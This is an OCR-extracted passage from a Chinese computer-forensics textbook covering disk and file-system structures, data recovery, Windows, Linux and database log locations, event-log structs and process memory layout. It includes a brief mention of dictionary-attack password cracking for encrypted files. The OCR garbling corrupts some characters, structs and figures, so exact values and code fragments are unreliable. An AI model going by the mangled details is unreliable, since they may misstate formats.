件 的 长 度 不 是 簇 长 度 的 整数 倍 ,那么 分 配给 文件 的 最 后 一 簇 中 会 有 未 被 当前 文件 使 用 的 和 
余 空 间 , 其 中 可 能 包含 了 先前 文件 遗留 下 来 的 信息 ,可 能 是 有 用 的 证 据 。 

(7) 打印 对 目标 计算 机 系统 的 全 面 分 析 结 果 , 然 后 给 出 分 析 结 论 。 如 系统 的 整体 情况 ， 
发 现 的 文件 结构 ,数据 和 作者 的 信息 ,对 信息 的 任何 隐藏 .删除 .保护 ,加密 企 图 ,以 及 在 调查 
中 发 现 的 其 他 的 相关 信息 。 

(8) 给 出 必需 的 专家 证 明 。 

以 上 是 事件 发 生 后 对 目标 系统 的 静态 分 析 注 意 事项 。 
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12.4 计算 机 取证 相关 技术 


计算 机 取证 技术 包括 数据 获取 技术 ,数据 分 析 技术 和 加 密 解 密 技 术 等 。 其 中 数据 获取 
技术 包括 对 磁盘 空间 、 未 分 配 空间 和 自由 空间 中 包含 的 信息 的 发 掘 技术 ;对 交换 文件 .缓存 
文件 ,临时 文件 中 包含 的 信息 的 复原 技术 ;计算 机 在 某 一 特定 时 刻 活 动 内 存 中 数据 的 收集 技 
术 , 如 内 存 数据 dump; 网 络 流动 数据 的 获取 技术 等 。 数 据 分 析 技 术 包 括 在 已 经 获取 的 数据 
流 或 信息 流 中 寻找 .匹配 关键 词 或 关键 短语 是 目前 的 主要 数据 分 析 技 术 ,如 文件 属性 分 析 技 
术 .文件 数字 摘要 分 析 技术 和 日 志 分 析 技 术 等 ;根据 已 经 获得 的 文件 或 数据 的 用 词 .语法 和 
写作 (编程 ) 风 格 ,推断 出 其 可 能 的 作者 的 分 析 技术 ;发掘 同 一 事件 的 不 同 证 据 间 的 联系 的 分 
析 技 术 。 加 密 解密 技术 包括 数据 解密 、 密 码 破译 ,对 电子 介质 中 被 保护 信息 的 强行 访问 技 
术 等 。 
12.4.1 电子 数据 获取 基本 知识 


1. 存储 系统 的 接口 标准 

主流 的 硬盘 接口 有 IDE/ATA、SCSI 和 SATA 等 。 主 流 的 数据 传输 接口 有 COM (并 
口 ) .RS232\485( 串 口 )。 其 他 数据 接口 有 USB 2. 0-3. 0、RJ( 网 线 卡 口 ) 等 。 

IDE(Integrated Drive Electronics) 是 普通 PC 的 标准 接口 ,只 需 用 一 根 电 缆 连 接 主 板 或 
接口 卡 , 也 叫 ATA(Advanced Technology Attachment) 接 口 。PC 硬盘 大 多 数 使 用 IDE 兼 
容 接口 ,新 一 代 Enhanced IDE (EIDE) 使 用 扩充 CHS (Cylinder-Head-Sector) 或 LBA 
(Logical Block Addressing) 寻 址 的 方式 ,突破 528MB 的 容量 限制 ,可 以 顺利 地 使 存储 容量 
达到 数 十 GB 等 级 的 IDE 硬盘 ,最 高 传输 速度 可 高 达 100MB/s(Ultra ATA/100)。 

SCSI 接口 不 是 专门 为 硬盘 设计 的 接口 ,是 一 种 广泛 应 用 于 小 型 机 上 的 高 速 数 据 传输 技 
术 , 主 要 应 用 于 中 、 高 端 服 务 器 和 高 档 工作 站 中 。SCSI 接口 具有 应 用 范围 广 、 多 任务 、 带 宽 
大 、CPU 占用 率 低 , 以 及 热 插 拔 等 优点 , 较 高 的 价格 使 得 它 很 难 如 IDE 硬盘 般 普 及 。SCSI 
需要 有 专门 的 控制 器 ,也 就 是 一 块 SCSI 控制 卡 才能 支持 SCSI 设备 ,能 处 理 大 部 分 的 工作 ， 
减少 了 中 央 处 理 器 的 负担 (CPU 占用 率 )。 市 场 中 占据 主流 的 是 Ultral60SCSI、 
Ultra320SCSI 接口 产品 。 

SATA(Serial ATA, 串 行 ATA) 是 一 种 完全 不 同 于 并 行 ATA 的 新 型 硬盘 接口 类 型 ,由 
于 采用 串 行 方式 传输 数据 而 得 名 。SATA 总 线 使 用 嵌入 式 时 钟 信 号 ,具备 了 更 强 的 纠 错 能 
力 ,能 对 传输 指令 (不 仅仅 是 数据 ) 进 行 检查 和 纠 错 , 提 高 了 数据 传输 的 可 靠 性 。 串 行 接口 还 
具有 结构 简单 .支持 热 搬 拔 的 优点 。 数 据 传输 率 Serial ATA 1. 0 的 传输 率 是 1. 5Gbps， 
Serial ATA 2. 0 的 传输 率 是 3. 0Gbps。 经 过 编码 后 的 Serial ATA 传输 速率 为 实际 传输 速 
率 的 1/10。 

2. 存储 介质 的 结构 

存储 介质 包括 硬盘 .软盘 .光盘 、U 盘 和 磁带 等 。 硬 盘 的 物理 结构 包括 柱 面 、 磁 头 、 磁 道 
和 扇 区 ,第 0 柱 面 的 0 磁道 0 扇 区 存放 操作 系统 的 主 引 导 记 录 (Master Boot Record， 
MBR)。 在 硬盘 上 有 目录 区 及 文件 存储 区 ,目录 区 中 有 FCB( 文 件 控制 块 ) 指 向 文件 存储 的 
物理 地 址 位 置 等 信息 (不 同 的 文件 系统 FCB 不 一 样 ) 。 系 统 寻 找 文件 时 是 在 目录 区 中 搜索 
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指定 的 FCB 得 到 后 返回 目标 文件 数据 。 硬 盘 可 分 为 几 个 逻辑 区 ,如 C.D.E 等 ,每 个 分 区 都 
有 一 个 文件 分 配 表 (FAT) ,FAT 上 就 是 一 一 对 应 每 个 簇 的 状态 。 硬 盘存 储 是 以 扇 区 512 字 
节 一 个 单位 ,而 文件 是 以 一 个 簇 一 个 单位 来 存储 ,一 个 簇 可 包含 几 个 扇 区 ,具体 几 个 由 头 信 
息 相应 位 置 读 取 , 最 后 一 个 簇 表示 文件 的 结束 。 文 件 系 统管 理 是 操作 系统 的 重要 部 分 ,文件 
的 存储 组 织 都 是 采用 目录 式 管理 - 树 型 结构 ,文件 夹 也 是 作为 一 个 文件 来 存 ,只 是 文件 夹 的 
内 容 是 文件 夹 内 文件 的 信息 。 

3. 文件 系统 

文件 是 一 组 数据 对 象 的 集合 ,能 从 外 部 对 其 引用 和 操作 。 操 作 系 统 通 过 文件 系统 存储 
文件 ,使 用 户 很 容易 通过 文件 名 \ 存 储 位 置 .日 期 或 其 他 特征 访问 各 类 文件 。Windows 文件 
系统 采用 FAT、NTFS, 而 UNIX/Linux 文件 系统 采用 index node(inode) 目录。 文件 系统 
只 对 特定 大 小 的 数据 单元 进行 操作 ,这 些 数 据 单元 在 UNIX 系统 中 称 作 “ 块 ”, 在 Windows 
系统 中 称 作 “ 徐 "。 这 些 数据 块 是 操作 系统 实际 存 取 数据 的 最 小 存储 单元 ,每 个 文件 都 由 若 
干 个 数据 块 组 成 。 

让 一 台 计 算 机 能 辨别 某 个 特定 的 文件 系统 的 过 程 称 为 装载 文件 系统 (启动 )。 格 式 化 是 
把 一 个 分 区 转换 成 操作 系统 能 够 识别 的 文件 系统 的 过 程 ,格式 化 只 不 过 是 对 文件 系统 中 各 
种 表 进 行 了 重新 构造 ,同时 会 创建 一 个 新 的 空间 索引 列表 ,指向 未 分 配 数 据 块 ,因此 格式 化 
操作 不 会 真正 改变 文件 系统 的 其 他 内 容 。 删 除 是 把 构成 文件 的 那些 数据 簇 放 回 到 系统 空闲 
块 列表 中 。 对 通常 的 文件 读 写 程序 来 说 ,这 些 簇 不 可 见 。 所 以 ,在 硬盘 上 有 大 量 不 在 文件 系 
统管 辖 范围 内 的 数据 ,但 这 些 数据 并 非 唾 手 可 得 。 文 件 系 统 组 织 如 图 12.4 和 图 12. 5 所 示 。 


Entire disk 


一 人 


Partition table Disk partition 


[ver 和 


Boot block | Super block | Free space mgmt | I-nodes Root dir | Files and directories 


图 12.4 Windows 文件 系统 组 织 


MS DOS 的 文件 系统 的 卷 结构 如 图 12.6 所 示 ,采用 FAT12 分 区 表 ( 两 个 镜像 , 互 为 备 
份 ) ,文件 分 配 采用 链 式 分 配方 法 。 每 个 FAT 表 项 所 占 位 数 是 簇 编号 的 位 数 ,其 值 0 表示 该 
簇 空 闪 ,FF7h 表示 物理 坏 扇 区 ,FF8h~FFFh 表示 该 簇 是 文件 的 最 后 一 个 簇 ,其 他 值 表示 该 
簇 被 文件 占用 ,而 且 表 项 中 的 值 是 文件 下 一 个 簇 的 编号 。 文 件 的 存储 空间 通常 由 多 个 簇 组 
成 ,而 每 个 簇 包 含 若干 个 连续 的 扇 区 (Sector)。 簇 (Cluster) 作 为 文件 存储 单位 可 大 可 小 , 簇 
较 大 可 提高 I/O 访问 性 能 , 减 小 管理 开销 ,但 簇 内 碎片 问题 较 严 重 ; 簇 较 小 会 使 钥 内 的 碎片 
浪费 较 小 ,特别 是 对 大 量 小 文件 存储 有 利 , 但 存在 复 编 号 空间 不 够 的 问题 (如 FAT12 、16、 
32)( 寻 址 能 力 限制 )。FAT 表 的 大 小 占 文件 卷 容量 的 比例 计算 : 

簇 编 号 位 的 数 /(8X512X 每 个 簇 的 扇 区 数 ) 
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I-node 
Attributes Single 
所 indirect 
办 block 
3? i ~ Double Addresses of 
己 indirect FE data blocks 
总 上 | block 
痢 
才 4 | 
~ Triple 
indirect 了 | 才 
7 block 
= ND pe 
a 
十 _ | 
ee 
图 12.5 A UNIX Inode (V7 File System) 
Sector# 0 1 N 2N 
Boot FATI FAT2 Root Data 
Record Directory (File & Directory) 


图 12.6 Volume structure in MS DOS 


文件 卷 容量 越 大 , 若 驴 的 总 数 保持 不 变 即 簇 编 号 所 需 位 数 保持 不 变 , 则 簇 越 大 , 簇 内 碎 
片 浪费 越 多 ;文件 卷 容量 越 大 , 若 马 大 小 不 变 , 则 簇 总 数 越 多 ,相应 簇 编号 所 需 位 数 越 多 。 如 
簇 编号 长 度 为 12、16、32 二 进 制 位 , 即 构成 FAT12、FAT16、FAT32。 

目录 是 目录 项 的 顺序 文件 ( 即 大 小 相同 的 排序 记录 序列 ) ,不 对 目录 项 排序 。 若 目录 中 
包含 的 文件 数目 较 多 , 则 搜索 效率 低 。 每 个 目录 项 大 小 为 32 字 节 ,其 内 容 包 括 文件 名 、 属 性 
(包括 文件 、 子 目录 和 文件 卷 标 识 ) ,最 后 一 次 修改 时 间 和 日 期 文件 长 度 、 第 一 个 簇 的 编号 。 
文件 名 一 般 不 区 分 大 小 写 。 目 录 项 与 文件 分 区 表 如 图 12.7 所 示 。 


FAT Dir Entry 
800h 823h 850h Filel 
823h 850h | FF8h Wi 800h 
ee | 


图 12.7 目录 项 与 文件 分 区 表 


4. 数据 恢复 原理 

计算 机 信息 是 用 0、1 编码 的 二 进 制 数据 流 表示 ,为 方便 查看 用 十 六 进 制 表示 。 有 意义 
的 数据 最 后 组 织 成 文件 ,文件 中 的 数据 可 以 使 用 工具 如 HexEditor、WinHex 进行 查看 与 
编辑 。 

文件 可 以 进行 新 建 . 打 开 查 看 .更 新 删除 等 操作 。 文 件 更 新 时 可 能 缩减 大 小 ,其 释放 的 
存储 区 域 依然 保存 着 旧 文件 的 数据 ,如 图 12. 8 所 示 。 文 件 删除 时 并 没有 实际 删除 磁盘 中 的 
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数据 ,只 进行 标记 ,仅仅 是 把 文件 的 首 字 节 改 为 E5H ,释放 磁盘 的 存储 空间 。 对 于 磁盘 格式 
化 ,一 般 是 逻辑 格式 化 ,也 称 为 高 级 格式 化 ,是 在 磁盘 上 建立 一 个 系统 存储 区 域 , 包 括 引导 记 
录 区 ,文件 目录 区 (FCT) 和 文件 分 配 表 (FAT)。 对 于 同样 的 操作 系统 ,逻辑 格式 化 并 没有 
改变 存储 单元 的 实际 数据 。 而 物理 格式 化 (也 称 为 低级 格式 化 ) 是 对 磁盘 的 物理 表面 进行 处 
理 , 在 磁盘 上 建立 标准 的 磁盘 记录 格式 ,划分 磁道 (Track) 和 扇 区 (Sector) 。 


旧 文件 旧 文 件 | 新 文件 


图 12.8 写 新 文件 一 一 部 分 覆盖 


因此 磁盘 中 存在 大 量 废弃 数 据 ,可 以 使 用 工具 和 技术 进行 恢复 。 相关 的 恢复 工具 有 
Norton Utilities .RECOVERNT、EasyRecovery 和 FinalData 等 。 

5. 数据 完整 性 和 安全 保密 性 

数据 完整 性 保证 计算 机 系统 上 的 数据 和 信息 处 于 一 种 完整 和 未 受 损 的 状态 ,也 就 是 说 
数据 不 会 被 有 意 或 无 意 的 事件 而 改变 或 丢失 ,包括 数据 的 存储 和 传输 完整 性 。 数 据 的 完整 
性 是 通过 访问 控制 .数据 备份 和 宛 余 设置 来 实现 。 

文件 完整 性 一 般 采用 循环 元 余 码 (CRC) 校 验 ,其 基本 原理 是 : 在 K 位 信息 码 后 再 拼接 
有 R 位 的 校 验 码 ,整个 编码 长 度 为 N 位 ,因此 这 种 编码 也 叫 (N,K) 码 。 对 于 一 个 给 定 的 (NN， 
K) 码 ,可 以 证 明 存 在 一 个 最 高 次 客 为 N 一 K 二 R 的 多 项 式 G(zx)。 根 据 G(z) 可 以 生成 K 位 
信息 的 校 验 码 , 而 G(x) 叫 作 CRC 码 的 生成 多 项 式 。 校 验 码 的 具体 生成 过 程 为 : 假设 发 送 
信息 用 信息 多 项 式 CCX) 表 示 , 将 C(x) 左 移 R 位 , 则 可 表示 成 C(x)X2 的 RR 次 方 ,这 样 
C(x) 的 右边 就 会 空 出 R 位 , 即 校 验 码 的 位 置 。 通 过 C(x)X2 的 R 次 方 除 以 生成 多 项 式 
G(x) 得 到 的 余数 就 是 校 验 码 。 

也 有 的 采用 哈 希 函数 生成 信息 摘要 来 校 验 ,防止 数据 被 算 改 ;或 者 采用 加 密 技术 和 数字 
签名 技术 来 保证 数据 的 完整 性 和 保密 性 ,从 而 保证 数据 的 安全 性 。 

6. 时间 因素 

特别 提出 数值 证 据 的 时 间 是 构成 犯罪 逻辑 非常 重要 的 因素 ,包括 数据 生成 的 系统 时 间 、 
用 户 的 行为 时 间 以 及 取证 的 时 间 ( 固 定 证 据 时 间 ) ,一 般 都 有 系统 的 时 间 惟 (TimeStamp)。 


12.4.2 电子 数据 采集 


电子 证 据 获 取 主 要 指数 据 采 集 , 包 括 外 存 文件 和 内 存 数据 。 采 集 技术 有 数据 恢复 、 日 志 
采集 和 内 存 数据 采集 等 。 

电子 证 据 包 括 文件 系统 中 所 存在 的 本 地 数据 、 搜 集 来 的 网 络 数据 以 及 周边 数据 (如 未 分 
配 的 磁盘 空间 、Slack 空间 ,临时 文件 或 交换 文件 ,其 中 可 能 含有 与 系统 中 曾 发 生 过 的 软件 
的 运行 ,特定 操作 的 执行 .曾经 进行 过 的 Internet 浏览 .E-mail 交流 等 相关 的 信息 ) 等 。 

证 据 相 关 文件 有 处 理 文件 .数据 文件 和 历史 记录 等 ,包括 普通 文件 .临时 文件 .日 志文 
件 , 注 册 表 交换 文件 或 页 面 文件 ,浏览 器 的 历史 和 收藏 夹 .Cookies、 隐 含 文件 .安装 程序 的 
残留 物 等 。 

1. 数据 恢复 

如 果 数 据 文件 写 到 基于 FAT 系统 的 磁盘 ,在 目录 入 口 和 FAT 中 记录 相应 信息 。 
Windows 的 资源 管理 器 等 工具 能 在 目录 入 口 看 到 的 文件 信息 ,如 文件 名 称 、 大 小 和 类 型 等 。 
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在 FAT(File Allocation Table) 中 相应 有 该 文件 的 记录 项 的 地 址 ,而 FAT 记录 了 该 文件 在 
磁盘 上 所 占用 的 各 个 实际 扇 区 的 位 置 。 删 除 文件 仅 清 除 目录 入 口中 的 信息 ,FAT 中 占用 的 
扇 区 也 被 标识 为 空闲 ,实际 扇 区 数据 并 未 被 真正 清除 。 

如 果 文 件 头 损坏 ,需要 清楚 地 了 解 文件 的 结构 ,或 者 用 专门 工具 才能 修复 。 如 果 是 压缩 
文件 损坏 ,如 ZIP 文件 可 以 用 一 个 名 为 ZIPFIX 的 工具 处 理 。 自 解压 文件 无 法 解压 ,也 需 用 
对 应 压缩 工具 按 一 般 压 缩 文 件 解压 。 

数据 库 文件 损坏 ,如 DBF 文件 死机 后 无 法 打开 ,记录 数 与 实际 不 匹配 , 需 向 下 调整 文件 
头 中 记录 数 。 

对 于 加 密 文件 ,首先 需要 了 解 加 密 的 算法 ,然后 进行 解密 或 密码 破解 ,或 采用 口令 破解 
软件 破解 ,如 zipcrack 等 ,其 原理 是 字典 攻击 。 

对 于 存储 扇 区 变换 的 文件 ,首先 排除 被 病毒 感染 的 可 能 ,用 可 靠 杀毒 软件 先 杀毒 ,如 果 
仍 不 能 还 原 被 移 走 的 重要 扇 区 , 则 需要 根据 文件 分 配 表 查看 存储 区 域 链接 ,然后 进行 谨慎 变 
换 。 相 应 工具 有 Winhex. exe、Diskgenius. exe 可 以 找 回 丢失 的 分 区 和 文件 , Hrsector. exe 
可 以 将 扇 区 备份 到 文件 保存 ,Hwsector. exe 可 以 将 备份 扇 区 数据 写 回 扇 区 。 

2. 日 志文 件 采 集 

日 志 是 记录 用 户 操作 历史 的 文件 ,是 最 直接 的 数字 证 据 。Windows 日 志文 件 一 般 有 三 
个 : 安全 日 志 % systemroot% \\ system32 \\ config \\ SecEvent. EVT,、 系 统 日 志 % 
systemroot%\\ system32\\ config \\ SysEvent. EVT、 应 用 程序 日 志 % systemroot%\\ 
system32\\config\\AppEvent. EVT。 

这 些 日 志文 件 的 默认 存放 位 置 可 以 在 注册 表 中 修改 ,修改 的 注册 项 为 : 


HKEY LOCAL MACHINE\SYstemNCurrentControlSet\Services\Event1og。 


可 以 用 winhex 打开 日 志文 件 并 查看 其 内 容 ,Windows MSDN 中 日 志文 件 头 的 结构 体 
数据 类 型 如 下 : 


typedef struct EVENTLOGHEADER { 


ULONG Headersize; // 文 件 头 的 大 小 ,是 固定 值 (0x30) 
ULONG Signature; // 特 定 码 值 ,总 是 (0x654c664c) 

ULONG MajorVersion; // 主 版 本 号 ,总 是 1 

ULONG MinorVersion; // 次 版 本 号 ,总 是 1 

ULONG Startoffset; // 第 一 条 (最 早 ) 日 志 记录 的 偏 移 量 
ULONG Endoffset; // 文 件 尾 的 文件 内 偏 移 量 

ULONG CurrentRecordNumber; // 将 要 产生 记录 的 记录 号 

ULONG OldestRecordNunmber; // 第 一 条 (最 早 ) 记 录 的 记录 号 

ULONG MaxSize; // 日 志文 件 的 总 大 小 ,这 里 是 64K (0x10000) 
ULONG Flags; // 日 志文 件 的 状态 标志 

ULONG Retention; // 文 件 创建 时 的 保留 值 ,与 注册 表 关 联 
ULONG EndHeaderSize; // 文 件 头 的 大 小 ,文件 头 结束 


}EVENTLOGHEADER, ¥* PEVENTLOGHEADER 
Windows MSDN 中 日 志文 件 尾 的 结构 体 数 据 类 型 如 下 : 


typedef struct EVENTLOGEOF { 
ULONG RecordsizeBeginning; // 文 件 尾 大 小 ,固定 值 (0x28) 
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ULONG One; // 标 识 符 ,总 是 (0x11111111) 


ULONG Two; // 标 识 符 ,总 是 (0x22222222) 

ULONG Three; // 标 识 符 ,总 是 (0x33333333) 

ULONG Four; // 标 识 符 ,总 是 (0x44444444) 

ULONG BeginRecord; // 第 一 条 (最 早 ) 日 志 记录 的 偏 移 量 

ULONG EndRecord; // 将 要 产生 新 的 一 条 记录 的 偏 移 量 , 即 当前 文件 尾 的 偏 移 量 


ULONG CurrentRecordNumber; // 将 要 产生 记录 的 记录 号 
ULONG OldestRecordNuniber; // 第 一 条 日 志 记录 的 记录 号 ,如 果 事件 日 志 为 空 时 这 里 的 值 是 0 
ULONG RecordsizeEnd; // 文 件 尾 大 小 ,是 固定 值 (0x28) 

} EVENTLOGEOF, * PEVENTLOGEOF; 


Windows MSDN 中 日 志 事 件 记 录 的 结构 体 数 据 类 型 如 下 : 


typedef struct EVENTLOGRECORD { 


DWORD Length; // 该 记录 的 大 小 

DWORD Reserved; // 固 定 值 ,总 是 (0x654c664c) 

DWORD RecordNunmber; // 记 录 号 ,当前 是 第 几 条 记录 

DWORD TimeGenerated; // 时 间 代 码 , 从 1970 年 到 现在 的 秒 数 
DWORD TimeWritten; // 时 间 代 码 , 从 1970 年 到 现在 的 秒 数 
DWORD EventID; // 事 件 ID 号 

WORD EventType; // 事 件 类 型 

WORD Numstringsy // 消 息 量 ,事件 包含 多 少 条 消息 


在 Win7 中 除了 有 XP 操作 系统 所 具有 的 3 种 日 志文 件 格式 外 ,还 多 了 一 个 XML 文件 
格式 。 由 于 XML 是 结构 化 文件 。 使 得 日 志 可 以 在 不 同 的 操作 系统 如 Linux 上 方便 共享 。 
IIS(Internet 信息 服务 ) 日 志 包 括 FTP 日 志和 Web 日 志 , 文 件 为 x*.1log。FTP 日 志文 
件 默 认 位 置 为 % systemroot%/system32/logfiles/msftpsvcl/, 上 默认 每 天 一 个 日 志 ; WWW 
日 志 上 默认 位 置 为 % systemroot%/system32/logfiles/w3svcl/, 上 默认 每 天 一 个 日 志 。 这 些 
LOG 文件 在 注册 表 中 的 键 项 为 HKEY _ LOCAL _ MACHINE/System/ Current 
ControlSet/Services/Eventlog,EVENTLOG 下 面 有 很 多 的 子 表 ,有 的 管理 员 很 可 能 将 这 些 
日 志 重 定位 。 
数据 库 (Oracle) 的 日 志 存 储 位 置 在 系统 初始 化 文件 的 参数 background_dump_dest 指 
定 的 路 径 下 ,一 般 为 %ORACLE_BASE%\admin\%ORACLE_SID%\bdump; 和 警告 日 志 
alert log ,在 系统 初始 化 文件 的 参数 background_dump_dest 设置 它 的 位 置 ;trace 日 志 一 
存放 seesion 追踪 的 信息 ,对 应 系统 初始 化 文件 的 参数 user_dump_dest 设置 它 的 位 置 ; 
audit 日 志 记 录 审 计 信息 ,对 应 系统 初始 化 文件 的 参数 audit_file_dest 设置 它 的 位 置 ;redo 
日 志 存放 数据 库 的 更 改 信息 ,select member from v $logfile; ,其 中 member 就 代表 它 的 位 
置 ;归档 日 志 是 redo 日 志 的 历史 备份 ,select * from v$parameter where name like ‘log_ 
archive_dest%'; , 它 的 value 值 就 是 位 置 。 
数据 库 SQL Server 的 数据 文件 由 一 个 mdf 和 一 个 ldf 文件 组 成 。 数 据 文件 mdf 中 包 
含 了 所 有 的 数据 库 对 象 和 数据 ,例如 表 、 存 储 过 程 和 用 户 信 息 等 。1df 文件 是 数据 库 的 日 志 
文件 ,其 中 包含 (或 者 曾经 包含 ) 了 数据 库 的 所 有 事务 日 志 , 仅 仅 通过 1df 日 志文 件 未 必 能 完 
全 恢复 受 损 数据 库 。1ldf 日 志文 件 作 为 事务 日 志 的 一 个 物理 存储 位 置 ,用 户 可 以 把 日 志 
1df 文件 中 备份 成 日 志 备份 ,可 以 通过 日 志 备 份 来 还 原 数据 库 。SQL Server 在 每 次 启动 时 
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也 会 从 1df 文件 中 读 取 日 志 , 以 对 之 前 没有 提交 的 事务 进行 回 深 或 者 对 一 些 已 提交 但 是 没 
有 写 人 数据 文件 的 事务 进行 前 滚 ,保证 事务 的 完整 性 。 数 据 库 的 一 个 完全 备份 包含 了 数据 
库 的 全 部 数据 ,但 是 并 不 会 包含 全 部 的 日 志 , 完 全 备份 只 包含 了 当前 数据 库 的 所 有 数据 页 和 
日 志 尾 部 ,日 志 尾 部 包含 了 数据 库 的 活动 日 志 , 当 从 一 个 完全 备份 还 原 数 据 库 时 ,SQL 
Server 会 根据 完全 备份 文件 中 的 日 志 来 对 数据 库 中 之 前 没有 提交 的 事务 进行 回 滚 ,或 者 对 
一 些 已 提交 但 是 没有 写 人 数据 文件 的 事务 进行 前 滚 。 

Linux 的 日 志文 件 系统 主要 有 在 Ext2 基础 上 开发 的 Ext3、 根 据 面向 对 象 思 想 设 计 的 
ReiserFS、 由 SGI IRIX 系统 移植 过 来 的 XFS. 由 IBM AIX 系统 移植 过 来 的 JFS。 其 中 
EXT3 完全 兼容 EXT2 ,其 磁盘 结构 和 EXT2 完全 一 样 , 只 是 加 入 日 志 技术 ;而 后 三 种 文件 
系统 广泛 使 用 了 B 树 以 提高 文件 系统 的 效率 。 

Linux 的 日 志文 件 系 统 跟 踪 记 录 文 件 系统 的 变化 ,并 将 变化 内 容 记 录入 日 志 。 每 隔 一 
定时 间 , 文 件 系 统 会 将 更 新 后 的 元 数据 及 文件 内 容 作 为 一 个 条 目 写 入 磁盘 的 /var/log/ 系 统 
日 志文 件 ,包括 以 下 文件 : 

。 boot. log。 记 录 开 机 自 检 的 启动 信息 。 
cron。 记 录 crontab 进程 或 其 派生 进程 的 事务 日 志 。 
dmesg。 记 录 内 核 启 动 时 的 检测 信息 ,输出 同 dmesg 命令 。 
lastlog。 所 有 账号 最 后 一 次 登录 的 相关 信息 ,输出 同 lastlog 命令 。 
maillog。 记 录 邮 件 来 往 信息 。 
messages。 记 录 系 统 错误 信息 。 
secure。 记 录 安 全 认证 信息 ,涉及 “输入 口令 ”的 操作 都 会 记录 于 此 。 
wtmp 与 faillog。 登 录 成 功 的 用 户 信息 (wtmp) 和 登录 失败 的 用 户 信息 (faillog)。 
httpd、samba 等 。 记 录 不 同 的 网 络 服务 用 自己 定制 的 日 志文 件 。 

。 xferlog。 该 日 志文 件 记 录 FTP 会 话 信息 。 

Linux 日 志 一 般 由 进程 syslogd 管理 。 

3. 内 存 数据 采集 

内 存 数 据 采 集 属于 动态 实时 取证 ,其 目的 是 收集 内 存 信 息 , 对 每 个 可 疑 进 程 深 入 分 析 。 
通常 用 strings 工具 从 内 存 中 提取 出 可 读 文本 内 容 , 或 利用 文件 提取 工具 从 内 存 中 恢复 相关 
的 可 执行 文件 。 

在 多 任务 操作 系统 中 的 每 一 个 进程 都 运行 在 一 个 属于 它 自己 的 虚拟 地 址 空间 (Virtual 
Address Space) ,在 32 位 模式 下 它 总 是 一 个 4GB 的 内 存 地 址 块 。 这 些 虚拟 地 址 通过 页 表 
(Page Table) 映 射 到 物理 内 存 , 页 表 由 操作 系统 维护 并 被 处 理 器 引用 。 每 一 个 进程 拥有 一 
套 属于 它 自己 的 页 表 , 包 括 内 核 本 身 也 使 用 一 部 分 虚拟 地 址 。 多 任务 OS 的 虚拟 空间 分 配 
如 图 12.9 所 示 。 

Windows 的 内 存 从 低 到 高 地 址 一 般 分 为 代码 区 .静态 数据 区 (常量 区 和 全 局 数据 区 ) 和 
动态 数据 区 ( 堆 区 和 栈 区 )。 代 码 区 存放 二 进 制 代码 ;常量 区 存放 所 有 常量 ,程序 结束 后 由 
OS 释放 ;全 局 数据 区 存放 全 局 变量 和 静态 数据 ,程序 结束 后 由 OS 释放 ; 堆 区 由 程序 分 配 和 
释放 ,存放 动态 数据 ; 栈 区 由 编译 器 自动 分 配 和 释放 ,存放 函数 局 部 变量 和 参数 值 。“ 栈 
(Stack)” 和 “ 堆 (Heap)" 是 两 种 不 同 的 动态 数据 区 , 栈 是 一 种 线性 结构 , 堆 是 一 种 链 式 结构 。 
进程 的 每 个 线程 都 有 私有 的 “ 栈 ” ,所 以 每 个 线程 虽然 代码 一 样 ,但 本 地 变量 的 数据 都 是 互 不 
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Linux User/Kernel 


Windows, default 


Memory Split memory split 
Kernel Space OxfPPT Ox 
1GB. 
3) Oxc0000000 Kemel Space 
(2GB) 
0x80000000 
User Mode Space 
(3GB) User Mode Space 
(2GB) 
0 0 
图 12.9 多 任务 OS 的 虚拟 空间 分 配 


Windows booted 
with /3GB switch 


Kernel Space 
(1GB) 


User Mode Space 
(3GB) 
Only applies to 
EXEs flagged as 
large-address 
aware. 


干扰 。 一 个 堆栈 可 以 通过 “基地 址 "和 * 栈 顶 ” 地 址 来 描述 。 全 局 变量 和 静态 变量 分 配 在 静态 
数据 区 (连续 内 存 ), 本 地 变量 分 配 在 动态 数据 区 , 即 堆栈 中 ,程序 通过 堆栈 的 基地 址 和 偏 移 


量 来 访问 本 地 变量 。 


Linux 进程 的 标准 的 内 存 段 布局 如 图 12. 10 所 示 , 阴 影 区 域 表示 映射 到 物理 内 存 的 虚 
拟 地 址 ,而 白色 区 域 表示 未 映射 的 部 分 ,箭头 表示 空间 增长 方向 。 


1GB 


Kernel space 
User code CANNOT read from nor write to these addresses, 
doing so results in a Segmentation Fault 


Stack (grows down) 


3GB 


Memory Mapping Segment 


File mappings (including dynamic libraries) and anonymous 


mappings. 和 /lib/libe.so 


人 


图 12. 10 


Oxc0000000==TASK_SIZE 


}》 Random stack offset 


RLIMIT_STACK (e.g.,8MB) 


}》 Random mmap offset 


program break brk 


Heap start_brk 
} Random brk offset 
Bss segment 
Uninitialized static variables, filled with zeros. 
Example: static char *userName; 
Data segment end_data 
Static variables initialized by the programmer. 
Example: static char *gonzo = “God’s own prototype”; start_data 
Text segment (ELF) end_code 
Stores the binary image of the process (e.g., /bin/gonzo) 
二 CE E ) 0x08048000 
0 


一 个 Linux 进程 的 标准 的 内 存 段 布局 
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内 存 中 的 进程 信息 通过 进程 环境 块 (Process Environment Block,PEB) 和 DTB 数据 页 
表 块 描述 。Windows 中 每 个 进程 都 在 内 存 中 有 一 个 对 应 的 Eprocess, 有 自己 的 PEB 信息 ， 
其 地 址 是 相对 固定 的 ,PEB 的 主要 结构 描述 如 图 12. 11 所 示 。 进 程 在 内 存 中 以 页 面 为 单位 
存储 数据 ,例如 SKL. EXE 进程 的 PEB 在 0x7FFDF000 处 ,这 是 用 户 区 ,可 以 直接 访问 ， 
0x7FFDF000 处 的 地 址 描述 如 表 12. 3 所 示 。 例 如 ,图 12. 12 为 Windows 内 存 进 程 skl. exe 
的 页 表 信息 ,准确 的 PEB 地 址 应 从 系统 的 Eprocess 结构 的 1b0H 偏 移 处 获得 ,如 表 12.4 所 


示 , 但 由 于 Eprocess 在 进程 的 核心 内 存 区 ,因此 不 能 直接 访问 。 
PPEB_LDR_DAT | InMemaryOrderModuleList | LDR-DATA_TABLE_EN 
PRTL_USER_PRO ne 
CESS_PAR ImagePathName DllBase 
i FullDlIName 
PPS POST_ PRO CommandLine 
TimeDate 
图 12.11 PEB 主要 结构 描述 
表 12.3 虚拟 地 址 0x7ffdf0000 的 组 成 
描述 位 二 进 制 十 六 进 制 十 进 制 
页 表 目 录 起 始 地 址 31 一 22 11111111 0Oxlff 511 
页 表 起 始 地 址 21~12 1111011111 0x3df 991 
偏 移 地 址 is 0 0x0 0 
Skl.exe Ox0a039000 
EROSESS 0x0a10200 
